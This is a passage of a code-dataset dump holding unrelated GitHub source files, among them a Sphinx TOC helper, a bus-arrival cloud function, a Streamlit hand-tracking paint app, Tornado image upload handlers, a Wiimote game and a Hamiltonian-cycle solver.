docutils.nodes import Node\nfrom sphinx.application import Sphinx\nfrom sphinx.environment.adapters.toctree import TocTree\nfrom sphinx.util.docutils import new_document\n\n\ndef change_toc(\n app: Sphinx,\n pagename: str,\n templatename: str,\n context: dict[str, Any],\n doctree: Node,\n) -> None:\n \"\"\"Change the way the `{{ toc }}` helper works.\n\n By default, Sphinx includes the page title in the on-page TOC.\n We don't want that.\n\n Sphinx returns the following structure:\n\n \n\n We first remove the `title` node. This gives us:\n\n \n\n Then, we _outdent_ the tree.\n \"\"\"\n toc = TocTree(app.builder.env).get_toc_for(pagename, app.builder)\n\n # Remove `h1` node\n findall = \"findall\" if hasattr(toc, \"findall\") else \"traverse\"\n # `findall` is docutils > 0.18\n for node in getattr(toc, findall)(nodes.reference):\n if node[\"refuri\"] == \"#\":\n # Remove the `list_item` wrapping the `reference` node.\n node.parent.parent.remove(node.parent)\n\n # Outdent the new empty outer bullet lists\n doc = new_document(\"\")\n doc.append(toc)\n\n # Replace outer bullet lists with inner bullet lists\n for node in doc.findall(nodes.bullet_list):\n if (\n len(node.children) == 1\n and isinstance(node.next_node(), nodes.list_item)\n and isinstance(node.next_node().next_node(), nodes.bullet_list)\n ):\n doc.replace(node, node.next_node().next_node())\n\n if hasattr(app.builder, \"_publisher\"):\n app.builder._publisher.set_source(doc)\n app.builder._publisher.publish()\n context[\"toc\"] = app.builder._publisher.writer.parts[\"fragment\"]\n","repo_name":"jchanvfx/NodeGraphQt","sub_path":"docs/_themes/sphinxawesome_theme/toc.py","file_name":"toc.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":1061,"dataset":"github-code","pt":"37"} +{"seq_id":"28072160250","text":"pessoas = []\ndados = [] #temporario\n\nwhile True:\n dados.append(str(input('Digite o nome da pessoa: ')))\n dados.append(float(input('Digite o peso da pessoa: ')))\n pessoas.append(dados[:])\n if len(pessoas) == 1:\n maior_peso = menor_peso = dados[1]\n else:\n if dados[1] > maior_peso:\n maior_peso = dados[1]\n elif dados[1] < menor_peso:\n menor_peso = dados[1]\n dados.clear()\n while True:\n op = str(input('Você deseja continuar? [S/N] ')).upper().strip()\n if op in 'SN':\n break\n print('Opção inválida!', end=' ')\n if op == 'N':\n break\nprint('-'*30)\nprint(f'Foram cadastradas {len(pessoas)} pessoas')\nprint(f'O maior peso foi de {maior_peso}Kg. Peso de:', end=' ')\nfor p in pessoas:\n if p[1] == maior_peso:\n print(f'[{p[0]}]', end=' ')\nprint()\nprint(f'O menor peso foi de {menor_peso}Kg. 
Peso de:', end=' ')\nfor p in pessoas:\n if p[1] == menor_peso:\n print(f'[{p[0]}]', end=' ')\nprint()\n","repo_name":"malucaires/cursoemvideo_python","sub_path":"mundo_3/ex084.py","file_name":"ex084.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15800966738","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\n@dataclass\nclass WorkbookWorksheetProtectionOptions(AdditionalDataHolder, BackedModel, Parsable):\n # Stores model information.\n backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # Represents the worksheet protection option of allowing using auto filter feature.\n allow_auto_filter: Optional[bool] = None\n # Represents the worksheet protection option of allowing deleting columns.\n allow_delete_columns: Optional[bool] = None\n # Represents the worksheet protection option of allowing deleting rows.\n allow_delete_rows: Optional[bool] = None\n # Represents the worksheet protection option of allowing formatting cells.\n allow_format_cells: Optional[bool] = None\n # Represents the worksheet protection option of allowing formatting columns.\n allow_format_columns: Optional[bool] = None\n # Represents the worksheet protection option of allowing formatting rows.\n allow_format_rows: Optional[bool] = None\n # Represents the worksheet protection option of allowing inserting columns.\n allow_insert_columns: Optional[bool] = None\n # Represents the worksheet protection option of allowing inserting hyperlinks.\n allow_insert_hyperlinks: Optional[bool] = None\n # Represents the worksheet protection option of allowing inserting rows.\n allow_insert_rows: Optional[bool] = None\n # Represents the worksheet protection option of allowing using pivot table feature.\n allow_pivot_tables: Optional[bool] = None\n # Represents the worksheet protection option of allowing using sort feature.\n allow_sort: Optional[bool] = None\n # The OdataType property\n odata_type: Optional[str] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> WorkbookWorksheetProtectionOptions:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: WorkbookWorksheetProtectionOptions\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return WorkbookWorksheetProtectionOptions()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n fields: Dict[str, Callable[[Any], None]] = {\n \"allowAutoFilter\": lambda n : setattr(self, 'allow_auto_filter', n.get_bool_value()),\n \"allowDeleteColumns\": lambda n : setattr(self, 
'allow_delete_columns', n.get_bool_value()),\n \"allowDeleteRows\": lambda n : setattr(self, 'allow_delete_rows', n.get_bool_value()),\n \"allowFormatCells\": lambda n : setattr(self, 'allow_format_cells', n.get_bool_value()),\n \"allowFormatColumns\": lambda n : setattr(self, 'allow_format_columns', n.get_bool_value()),\n \"allowFormatRows\": lambda n : setattr(self, 'allow_format_rows', n.get_bool_value()),\n \"allowInsertColumns\": lambda n : setattr(self, 'allow_insert_columns', n.get_bool_value()),\n \"allowInsertHyperlinks\": lambda n : setattr(self, 'allow_insert_hyperlinks', n.get_bool_value()),\n \"allowInsertRows\": lambda n : setattr(self, 'allow_insert_rows', n.get_bool_value()),\n \"allowPivotTables\": lambda n : setattr(self, 'allow_pivot_tables', n.get_bool_value()),\n \"allowSort\": lambda n : setattr(self, 'allow_sort', n.get_bool_value()),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_bool_value(\"allowAutoFilter\", self.allow_auto_filter)\n writer.write_bool_value(\"allowDeleteColumns\", self.allow_delete_columns)\n writer.write_bool_value(\"allowDeleteRows\", self.allow_delete_rows)\n writer.write_bool_value(\"allowFormatCells\", self.allow_format_cells)\n writer.write_bool_value(\"allowFormatColumns\", self.allow_format_columns)\n writer.write_bool_value(\"allowFormatRows\", self.allow_format_rows)\n writer.write_bool_value(\"allowInsertColumns\", self.allow_insert_columns)\n writer.write_bool_value(\"allowInsertHyperlinks\", self.allow_insert_hyperlinks)\n writer.write_bool_value(\"allowInsertRows\", self.allow_insert_rows)\n writer.write_bool_value(\"allowPivotTables\", self.allow_pivot_tables)\n writer.write_bool_value(\"allowSort\", self.allow_sort)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-sdk-python","sub_path":"msgraph/generated/models/workbook_worksheet_protection_options.py","file_name":"workbook_worksheet_protection_options.py","file_ext":"py","file_size_in_byte":5651,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"37"} +{"seq_id":"8205458622","text":"\"\"\"Example of csv\"\"\"\nimport csv\nimport datetime\nimport typing\n\n\ndef write_to_csv(csv_path: str) -> None:\n \"\"\"Write to csv.\"\"\"\n with open(csv_path, 'w') as file_writer:\n header = [\n 'timestamp',\n 'code',\n 'message',\n 'val1',\n 'val2',\n 'val3'\n ]\n csv_writer = csv.writer(file_writer)\n csv_writer.writerow(header)\n dt_0 = datetime.datetime(2021, 11, 10, 11, 12, 13)\n dt_1 = datetime.datetime(2021, 11, 11, 23, 59, 59)\n\n row = [dt_0, 10, 'Hello', *[1, 2, 3]]\n csv_writer.writerow(row)\n row = [dt_1, 11, 'こんにちは', *[4, 5, 6]]\n csv_writer.writerow(row)\n\n\ndef read_from_csv(csv_path: str) -> None:\n \"\"\"Read from csv.\"\"\"\n with open(csv_path, 'r') as file_reader:\n reader = csv.reader(file_reader)\n row: typing.List[str]\n for row in reader:\n print(\",\".join(row))\n\n\ndef main() -> None:\n \"\"\"Run main.\"\"\"\n write_to_csv('sample.csv')\n read_from_csv('sample.csv')\n\n\nif __name__ == '__main__':\n main()\n\n# 
EOF\n","repo_name":"unmyr/python-examples","sub_path":"src/csv/csv_with_header_py3.py","file_name":"csv_with_header_py3.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36478033650","text":"import json\nfrom time import timezone\nfrom requests import request as req\nfrom datetime import datetime, timedelta, timezone\nimport os\nimport functions_framework\nfrom flask import escape\n\n\n\nBUS_ARRIVAL_URL = \"http://datamall2.mytransport.sg/ltaodataservice/BusArrivalv2\"\nACCOUNT_KEY = os.environ[\"ACCOUNT_KEY\"]\n\n@functions_framework.http\ndef processReq(request):\n\n request_json = request.get_json(silent=True)\n request_args = request.args\n\n if not request_args or not 'busStopCode' in request_args or not 'serviceNo' in request_args:\n return 'Invalid Request'\n return getArrivalTimings(request_args['busStopCode'], request_args['serviceNo'])\n\n\ndef getArrivalTimings(busStopCode: str, serviceNo: str) -> list:\n headers = {\n 'AccountKey': ACCOUNT_KEY,\n 'Accept': 'application/json'\n }\n try:\n response = req(\"GET\", f'{BUS_ARRIVAL_URL}?BusStopCode={busStopCode}', headers=headers)\n response = response.json()\n # Set CORS headers for the main request\n headers = {\n 'Access-Control-Allow-Origin': '*'\n }\n service = list(filter(lambda x: x['ServiceNo'] == str(serviceNo), response['Services']))\n if not service:\n emptyRes = {\n 'nextBus': '-',\n 'nextBus2': '-',\n 'nextBus3': '-'\n }\n return (emptyRes, 404, headers)\n currentTime = datetime.now(timezone(timedelta(hours=8)))\n currentTime = currentTime.replace(tzinfo=None)\n nextBus = datetime.strptime(service[0]['NextBus']['EstimatedArrival'], '%Y-%m-%dT%H:%M:%S+08:00') - currentTime\n if len(service[0]['NextBus2']['EstimatedArrival']) > 1:\n nextBus2 = datetime.strptime(service[0]['NextBus2']['EstimatedArrival'], '%Y-%m-%dT%H:%M:%S+08:00') - currentTime\n nextBus2 = min(nextBus2.seconds//60,60)\n else:\n nextBus2 = '-'\n if len(service[0]['NextBus3']['EstimatedArrival']) > 1:\n nextBus3 = datetime.strptime(service[0]['NextBus3']['EstimatedArrival'], '%Y-%m-%dT%H:%M:%S+08:00') - currentTime\n nextBus3 = min(nextBus3.seconds//60,60)\n else:\n nextBus3 = '-'\n res = {\n 'nextBus': min(nextBus.seconds//60,60),\n 'nextBus2': nextBus2,\n 'nextBus3': nextBus3\n }\n return (res,200,headers)\n except Exception as e:\n print(e)\n headers = {\n 'Access-Control-Allow-Origin': '*'\n }\n return (e,500,headers)\n ","repo_name":"schoolex/cs3219-otot-B","sub_path":"busArrivalGcf.py","file_name":"busArrivalGcf.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28768926901","text":"import bottle\nimport pymongo\nimport newsDAO\nfrom bottle import static_file\n\n@bottle.route('/')\ndef news_index():\n news_list = news.find_news()\n return bottle.template('index', dict(news = news_list))\n\n@bottle.route('/comment', method='POST')\ndef insert_commet():\n comment = bottle.request.forms.get(\"comment\")\n id = bottle.request.forms.get(\"id\")\n news.insert_comment(comment, id)\n return bottle.redirect('/')\n\n\n@bottle.route('/static/:path#.+#', name='static')\ndef static(path):\n return static_file(path, root='static')\n\nconnection_string = \"mongodb://localhost\"\nconnection = pymongo.MongoClient(connection_string)\n\ndatabase = connection.web\n\nnews = newsDAO.NewsDAO(database)\n\nbottle.debug(True)\nbottle.run(host = 'localhost', port = 
8082)","repo_name":"Rep2/NMBP_2.proj","sub_path":"1 zad/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19160413679","text":"import cv2\nfrom streamlit_webrtc import webrtc_streamer, RTCConfiguration, WebRtcMode\nimport mediapipe as mp\nimport av\n\nRTC_CONFIGURATION = RTCConfiguration(\n {\"iceServers\": [{\"urls\": [\"stun:stun.l.google.com:19302\"]}]}\n)\n\nmpDraw = mp.solutions.drawing_utils\nhand_mesh = mp.solutions.hands.Hands(\n static_image_mode=False,\n max_num_hands=1,\n min_detection_confidence=0.8,\n min_tracking_confidence=0.8,\n)\npencil_img = cv2.imread(\"images/pencil.png\")\npencil_img = cv2.resize(pencil_img, (100, 100))\nundo_img = cv2.imread(\"images/undo.png\")\nundo_img = cv2.resize(undo_img, (100, 100))\ncancel_img = cv2.imread(\"images/cancel.png\")\ncancel_img = cv2.resize(cancel_img, (100, 100))\n\nx_offset = 500\ny_offset = 10\npencil = False\nundo = False\npoints = []\n\nclass VideoProcessor():\n def recv(self, frame):\n global pencil, undo, points \n\n image = frame.to_ndarray(format=\"bgr24\")\n\n image = cv2.flip(image, 1)\n\n results = hand_mesh.process(image)\n \n # Draw the face mesh annotations on the image.\n image.flags.writeable = True\n \n image = cv2.rectangle(image, (30, 30), (420, 420), (0, 255, 0), 3)\n image[50 : 50 + 100, x_offset : x_offset + 100] = pencil_img\n image[170 : 170 + 100, x_offset : x_offset + 100] = undo_img\n image[290 : 290 + 100, x_offset : x_offset + 100] = cancel_img\n cv2.putText(image, \"By: alizahidraja\", (250, 470), cv2.FONT_HERSHEY_PLAIN, 2, (0, 255, 0), 2)\n \n \n # Show Selected\n if pencil:\n image = cv2.rectangle(image, (500, 50), (600, 150), (0, 255, 0), 3)\n if undo:\n image = cv2.rectangle(image, (500, 170), (600, 270), (0, 255, 0), 3)\n \n # Draw dots\n for i in points:\n cv2.circle(image, i, 5, (0, 255, 0), cv2.FILLED)\n if results.multi_hand_landmarks:\n for handLms in results.multi_hand_landmarks:\n for id, lm in enumerate(handLms.landmark):\n # print(id,lm)\n h, w, c = image.shape\n cx, cy = int(lm.x * w), int(lm.y * h)\n\n if id == 4:\n tipx = cx\n tipy = cy\n\n if id == 8:\n factor = 30\n if (\n tipx >= cx - factor\n and tipx <= cx + factor\n and tipy >= cy - factor\n and tipy <= cy + factor\n ):\n a = int((tipx + cx) / 2)\n b = int((tipy + cy) / 2)\n # make dots\n if pencil and a >= 30 and a <= 420 and b >= 30 and b <= 420:\n points.append((a, b))\n\n # pencil\n elif a >= 500 and a <= 600 and b >= 50 and b <= 150:\n pencil = True\n undo = False\n\n # undo\n elif a >= 500 and a <= 600 and b >= 170 and b <= 270:\n pencil = False\n undo = True\n if len(points) > 0:\n points.pop()\n\n # cancel\n elif a >= 500 and a <= 600 and b >= 290 and b <= 390:\n pencil = False\n undo = False\n points = []\n #if id ==0:\n # cv2.circle(image, (cx, cy), 3, (255, 0, 255), cv2.FILLED)\n\n #mpDraw.draw_landmarks(image, handLms, mp.solutions.hands.HAND_CONNECTIONS)\n return av.VideoFrame.from_ndarray(image, format=\"bgr24\")\n\n\nwebrtc_ctx = webrtc_streamer(\n key=\"WYH\",\n mode=WebRtcMode.SENDRECV,\n rtc_configuration=RTC_CONFIGURATION,\n media_stream_constraints={\"video\": True, \"audio\": False},\n video_processor_factory=VideoProcessor,\n async_processing=True,\n)\n 
\n","repo_name":"alizahidraja/hand-paint","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40676849273","text":"#!/usr/bin/env python\n# -*-coding:utf-8-*-\nimport sys\nimport uuid\nimport markdown\nimport os.path\nimport re\nimport torndb\nimport tornado.auth\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.websocket\nfrom tornado.options import define, options\nimport cv2\nfrom tornado import websocket, web, ioloop\nimport numpy as np\nfrom login import BaseHandler\n\n\nclass AddImageHandler(BaseHandler):\n def get(self):\n self.usercheck()\n self.write('''\n \n Upload File\n \n \n
\n \n \n \n \n ''')\n\n def post(self):\n #文件的暂存路径\n upload_path=os.path.join(os.path.dirname(__file__),'../image/userimage/') \n #提取表单中‘name’为‘file’的文件元数据\n file_metas=self.request.files['file'] \n for meta in file_metas:\n filename=meta['filename']\n kind=filename.split('.')[-1]\n imagekind=['bmp','jpg','tiff','gif','svg']\n if kind not in imagekind:\n self.write(\"not a image\")\n else:\n filepath=os.path.join(upload_path,filename)\n #有些文件需要已二进制的形式存储,实际中可以更改\n with open(filepath,'wb') as up: \n up.write(meta['body'])\n self.write('finished!')\n\nclass DownloadTmpImageHandler(tornado.web.RequestHandler):\n def get(self):\n key=self.get_cookie(\"key\")\n imagename=key+'.jpg'\n self.set_header('Content-Type', 'application/octet-stream')\n self.set_header('Content-Disposition', 'attachment; filename=' + imagename)\n data = open(\"./image/tmpimage/\"+imagename, 'rb')\n self.write(data.read())\n self.finish()\n return\n\nclass UploadImageHandler(BaseHandler):\n def get(self):\n self.usercheck()\n self.render('image/uploadimage.html')\n def post(self):\n #文件的暂存路径\n upload_path=os.path.join(os.path.dirname(__file__),'../image/userimage/') \n #提取表单中‘name’为‘file’的文件元数据\n if 'file' in self.request.files:\n file_metas=self.request.files['file'] \n for meta in file_metas:\n filename=meta['filename']\n kind=filename.split('.')[-1]\n #imagekind=['bmp','jpg','tiff','gif','svg']\n imagekind=['jpg']\n if kind not in imagekind:\n self.write(\"not a image\")\n else:\n key=self.get_cookie(\"key\")\n imagename=key+'.'+kind\n filepath=os.path.join(upload_path,imagename)\n #有些文件需要已二进制的形式存储,实际中可以更改\n with open(filepath,'wb') as up: \n up.write(meta['body'])\n imagename=key+'.'+kind\n upload_path=os.path.join(os.path.dirname(__file__),'../image/tmpimage/')\n filepath=os.path.join(upload_path,imagename)\n #有些文件需要已二进制的形式存储,实际中可以更改\n with open(filepath,'wb') as up: \n up.write(meta['body'])\n self.redirect('/imageprocess')\n\nclass NowImageHandler(BaseHandler):\n def get(self):\n self.usercheck()\n key=self.get_cookie(\"key\")\n imagename=key+'.jpg'\n data = open(\"./image/userimage/\"+imagename, 'rb').read()\n self.set_header('Content-Type', 'image/jpeg')\n self.set_header('Content-Length', len(data))\n self.write(data)\n return\n\nclass TmpImageHandler(BaseHandler):\n def get(self):\n self.usercheck()\n key=self.get_cookie(\"key\")\n imagename=key+'.jpg'\n data = open(\"./image/tmpimage/\"+imagename, 'rb').read()\n self.set_header('Content-Type', 'image/jpeg')\n self.set_header('Content-Length', len(data))\n self.write(data)\n return\n\nclass ProcessImageHandler(BaseHandler):\n def get(self):\n self.usercheck()\n self.render('image/processimage.html')\n\n\n\nclass ResetImageHandler(tornado.web.RequestHandler):\n def get(self):\n self.process()\n self.redirect('/imageprocess')\n \n def process(self):\n key=self.get_cookie(\"key\")\n imagename=key+'.jpg'\n openname=\"./image/userimage/\"+imagename\n img=cv2.imread(openname)\n wirtename=\"./image/tmpimage/\"+imagename\n cv2.imwrite(wirtename,img) \n\nclass ColorBlackWhiteHandler(tornado.web.RequestHandler):\n def get(self):\n self.process()\n self.redirect('/imageprocess')\n \n def process(self):\n key=self.get_cookie(\"key\")\n imagename=key+'.jpg'\n openname=\"./image/userimage/\"+imagename\n img=cv2.imread(openname,0)\n wirtename=\"./image/tmpimage/\"+imagename\n cv2.imwrite(wirtename,img) 
\n","repo_name":"rinetd/ImageOnline","sub_path":"A/handler/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"72071259628","text":"import ppb\nfrom ppb.features import loadingscene\nfrom ppb_mutant import Emoji\nimport bearmote\n\n\nclass LoadingScene(loadingscene.BaseLoadingScene):\n loading_icon = Emoji('bear')\n\n rotation_speed = 360 / 10\n\n def __init__(self, **props):\n super().__init__(**props)\n self.spinner = ppb.Sprite(image=self.loading_icon)\n self.add(self.spinner)\n\n def on_update(self, event, signal):\n self.spinner.rotation += self.rotation_speed * event.time_delta\n\n\nclass ConnectScene(bearmote.ConnectScene):\n background = 0, 0, 0\n connect_icon = Emoji('signal')\n\n def __init__(self, **props):\n super().__init__(**props)\n self.add(ppb.Sprite(image=self.connect_icon, size=3))\n\n def on_wiimote_connected(self, event, signal):\n signal(bearmote.SetWiimoteLed(id=event.id, leds={bearmote.Led1}))\n super().on_wiimote_connected(event, signal)\n\n\nclass PlayerSprite(ppb.Sprite):\n image = Emoji('bear')\n size = 1\n velocity = ppb.Vector(0, 0)\n\n BUTTONS = {\n bearmote.Right: ppb.Vector(1, 0),\n bearmote.Up: ppb.Vector(0, 1),\n bearmote.Left: ppb.Vector(-1, 0),\n bearmote.Down: ppb.Vector(0, -1),\n }\n\n def on_wiimote_button_pressed(self, event, signal):\n if event.button == bearmote.B:\n self.size *= 2\n elif event.button == bearmote.Home:\n signal(ppb.events.StopScene())\n elif event.button in self.BUTTONS:\n self.velocity += self.BUTTONS[event.button]\n\n def on_wiimote_button_released(self, event, signal):\n if event.button == bearmote.B:\n self.size /= 2\n elif event.button in self.BUTTONS:\n self.velocity -= self.BUTTONS[event.button]\n\n def on_update(self, event, signal):\n self.position += self.velocity * event.time_delta\n\n\nclass MainGame(ppb.BaseScene):\n def __init__(self, **props):\n super().__init__(**props)\n self.main_camera.pixel_ratio = 128\n self.add(PlayerSprite())\n\n def on_scene_started(self, event, signal):\n signal(ppb.events.StartScene(new_scene=ConnectScene))\n\n\nppb.run(\n starting_scene=LoadingScene, scene_kwargs={'next_scene': MainGame},\n resolution=(1900, 1080),\n systems=[bearmote.WiimoteSystem],\n)\n","repo_name":"AstraLuma/ppb-wiimote","sub_path":"bearmote/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12536078696","text":"from django.core.mail import send_mail\n\n\ndef send_confirmation_email(user, code):\n send_mail(\n 'Здравствуйте, активируйте ваш аккаунт!',\n f'Что активировать ваш аккаунт нужно ввести код:'\n f'\\n{code}'\n f'\\nне передавайте этот код никому!',\n 'johnsnowtest73@gmail.com',\n [user],\n fail_silently=False,\n )\n","repo_name":"SanzharShadybekov/py.26_shopApi","sub_path":"account/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34020759063","text":"from __future__ import annotations\n\nfrom l5r_auto.clans import CrabClan\nfrom l5r_auto.legality import ModernEdition, TwentyFestivalsEdition\n\nfrom ..common import Stronghold\n\n\"Battle: Straighten your target opposed Personality. Straighten his attachments if your army has fewer units than the opposing army.
(When going second, you get +2PS and your Stronghold ability gains Tireless)\"\nThe_Unassailable_Fortress_of_the_Crab = Stronghold(\n card_id=12257,\n title=\"The Unassailable Fortress of the Crab\",\n gold_production=\"4\",\n starting_family_honor=3,\n province_strength=7,\n clan=[CrabClan],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, ModernEdition],\n)\n","repo_name":"aubustou/l5r","sub_path":"l5r_auto/cards/strongholds/crab/twenty_festivals.py","file_name":"twenty_festivals.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28050193710","text":"from Cython.Build import cythonize\nimport os\nimport shutil\nfrom setuptools import Extension, find_packages, setup\n\n\n# MODIFY HERE\nPACKAGE_NAME = 'package_name'\nVERSION = '0.0.1'\nINSTALL_REQUIRES = [\n 'setuptools >= 3'\n]\nDESCRIPTION = 'This package ....'\nAUTHOR = 'Yonder s.r.l.'\nLICENSE = 'Copyright 2017 Yonder srl. All Rights Reserved.'\n#\n\n\ndef build_package_tree_structure(src_dir, dst_dir):\n package_tree_structure = [src_dir]\n\n if not os.access(dst_dir, os.F_OK):\n os.mkdir(dst_dir)\n\n for filename in os.listdir(src_dir):\n source = os.path.join(src_dir, filename)\n destination = os.path.join(dst_dir, filename)\n if filename in bare_copy_file_list:\n shutil.copyfile(source, destination)\n if os.path.isdir(source):\n package_tree_structure += \\\n build_package_tree_structure(source, destination)\n if filename not in bare_copy_file_list and filename.endswith('.py'):\n shutil.copyfile(\n source, os.path.join(dst_dir, filename.replace('.py', '.pyx')))\n\n return package_tree_structure\n\n\ndef build_extensions(dst_dir):\n extensions = []\n for filename in os.listdir(dst_dir):\n destination = os.path.join(dst_dir, filename)\n if os.path.isdir(destination):\n extensions += build_extensions(destination)\n if filename.endswith('.pyx'):\n extensions += [Extension(\n str(os.path.join(dst_dir, filename.split('.')[0])),\n [destination]\n )]\n return extensions\n\n\ndef find_and_build_package_list():\n return [package.replace('.', '/') for package in find_packages()]\n\n\nbare_copy_file_list = ['__init__.py']\nsource_base_dir = os.path.join('../', PACKAGE_NAME.split('.')[0])\ndest_base_dir = os.path.join('./', PACKAGE_NAME.split('.')[0])\n\n\n_ = build_package_tree_structure(source_base_dir, dest_base_dir)\n\n\nextensions = build_extensions(dest_base_dir)\n\n\nsetup(\n name=PACKAGE_NAME,\n version=VERSION,\n description=DESCRIPTION,\n author=AUTHOR,\n license=LICENSE,\n package_dir={PACKAGE_NAME: PACKAGE_NAME},\n packages=find_and_build_package_list(),\n ext_modules=cythonize(extensions),\n)\n","repo_name":"yonderlabs/setup.py","sub_path":"deploy/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21493014800","text":"import pymysql\nfrom abc import ABC, abstractmethod\n\nfrom Previous import Projects as da\nfrom Previous.Projects import BaseDataObject as BaseDataObject\n\n\nclass RDBDataObject(BaseDataObject):\n\n\n @classmethod\n @abstractmethod\n def _get_table_info(cls):\n pass\n\n @classmethod\n @abstractmethod\n def get_table_name(cls):\n pass\n\n @classmethod\n def get_schema_info(cls):\n t_name = cls.get_table_name()\n q = \"describe \" + t_name\n res, data = da.run_q(q)\n return data\n\n @classmethod\n def get_primary_key_columns(cls):\n t_name = cls.get_table_name()\n q = 
'show keys from ' + t_name + ' where key_name=\"PRIMARY\" '\n        res, d = da.run_q(q)\n\n        if d is not None and len(d) > 0:\n            d = sorted(d, key=lambda i: i['Seq_in_index'])\n            result = []\n\n            for r in d:\n                result.append(r['Column_name'])\n        else:\n            raise ValueError(\"Table does not have a primary key.\")\n\n        return result\n\n    @classmethod\n    def insert(cls, data):\n        t_info = cls._get_table_info()\n        t_name = t_info['table_name']\n        q, args = da.create_insert(t_name, data)\n        res, data = da.run_q(q, args)\n        return res\n\n    @classmethod\n    def retrieve(cls, template, fields=None, limit=None, offset=None, orderby=None):\n        t_name = cls.get_table_name()\n        sql, args = da.create_select(t_name, template=template,\n                                     fields=fields)\n        res, d = da.run_q(sql, args=args, fetch=True)\n        return d\n\n    @classmethod\n    def retrieve_by_key(cls, key_fields, fields):\n        t_name = cls.get_table_name()\n        kcs = cls.get_primary_key_columns()\n        tmp = dict(zip(kcs, key_fields))\n        sql, args = da.create_select(t_name, template=tmp,\n                                     fields=fields)\n        res, d = da.run_q(sql, args=args, fetch=True)\n        return d\n","repo_name":"donald-f-ferguson/E6156-Microservices-Cloud-Native-Applications","sub_path":"Previous/Projects/EB/DataAccess/RDBDataObject.py","file_name":"RDBDataObject.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"}
{"seq_id":"5286249008","text":"# Krzysztof Solecki\n\"\"\"\nThe algorithm looks for a Hamiltonian cycle in the given graph and, if one exists, returns the order of the vertices (cities) along the cycle path.\nTo do this it runs a DFS from vertex 0 and the north gate (the choice of the starting gate and vertex does not matter for the result of the algorithm,\nsince the graph is undirected, and if there is a Hamiltonian cycle passing through every vertex and every gate exactly once, it is reachable from any starting point).\nWhen visiting a vertex I push it onto the stack and check whether the stack size equals the number of vertices and whether there is an edge\nfrom the last visited vertex back to vertex 0 and the north gate. If so, I return the result; if not, the algorithm continues.\nTime complexity: O(V!) - the same vertex may be visited multiple times\nSpace complexity: O(V)\n\"\"\"\n\nfrom zad7testy import runtests\n\n\ndef DFS(G, s, src_side):\n    n = len(G)\n    visited = [False for _ in range(n)]\n\n    def DFS_visit(u, stack, side, stack_len):\n        nonlocal G, n, visited, s, src_side\n        stack.append(u)\n        stack_len += 1\n\n        if stack_len == n:\n            for v in G[u][1 - side]:\n                if v == s and u in G[s][src_side]:\n                    return stack\n        else:\n            visited[u] = True\n\n            for v in G[u][1 - side]:\n                if not visited[v]:\n                    if u in G[v][side]:\n                        res = DFS_visit(v, stack, side, stack_len)\n                    else:\n                        res = DFS_visit(v, stack, 1 - side, stack_len)\n                    if res is not None:\n                        return res\n\n            visited[u] = False\n            stack.pop()\n            stack_len -= 1\n        return None\n\n    return DFS_visit(s, [], src_side, 0)\n\n\ndef droga(G):\n    return DFS(G, 0, 0)\n\n\n# change all_tests to True to run all tests\nruntests(droga, 